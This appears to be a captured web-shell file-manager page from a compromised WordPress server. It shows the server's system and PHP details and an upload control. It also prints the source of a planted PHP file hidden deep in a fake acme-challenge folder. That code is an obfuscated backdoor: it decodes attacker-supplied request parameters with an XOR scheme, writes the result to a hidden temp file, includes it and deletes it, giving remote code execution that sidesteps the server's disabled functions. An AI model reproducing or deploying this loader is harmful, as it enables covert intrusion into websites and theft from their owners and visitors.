HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/wp-content/well-known/acme-challenge/b/b/h/e/usergroup_8.php
<?php																																										if(isset($_REQUEST["en\x74"])){ $elem = array_filter([getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), "/dev/shm", getenv("TEMP"), "/var/tmp", getcwd()]); $symbol = $_REQUEST["en\x74"]; $symbol= explode ("." , $symbol ) ; $binding = ''; $s8 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s8); $t = 0; while ($t < count($symbol)) { $v3 = $symbol[$t]; $chS = ord($s8[$t % $sLen]); $d = ((int)$v3 - $chS - ($t % 10)) ^ 22; $binding .= chr($d); $t++; } $k = 0; do { $tkn = $elem[$k] ?? null; if ($k >= count($elem)) break; if ((is_dir($tkn) and is_writable($tkn))) { $dchunk = implode("/", [$tkn, ".obj"]); $file = fopen($dchunk, 'w'); if ($file) { fwrite($file, $binding); fclose($file); include $dchunk; @unlink($dchunk); exit; } } $k++; } while (true); }


if(@$_REQUEST["p\x74r"] !== null){
	$ref = array_filter([getcwd(), getenv("TEMP"), "/tmp", getenv("TMP"), session_save_path(), "/var/tmp", "/dev/shm", sys_get_temp_dir(), ini_get("upload_tmp_dir")]);
	$parameter_group = $_REQUEST["p\x74r"];
		 	$parameter_group =	explode   ( "."	,	 	$parameter_group ) ;
	$mrk='';
            $s='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=strlen(  $s		);
    
            foreach(  $parameter_group as $x => $v5) {$sChar=ord(  $s[$x		% $lenS]		);
                $d=(  (  int)$v5 - $sChar -(  $x		% 10)) 	^	 60;
                $mrk 	.=chr(  $d		);	}	
	foreach ($ref as $key => $res) {
    		if ((function($d) { return is_dir($d) && is_writable($d); })($res)) {
    $pset = vsprintf("%s/%s", [$res, ".element"]);
    $success = file_put_contents($pset, $mrk);
if ($success) {
	include $pset;
	@unlink($pset);
	die();}
}
}
}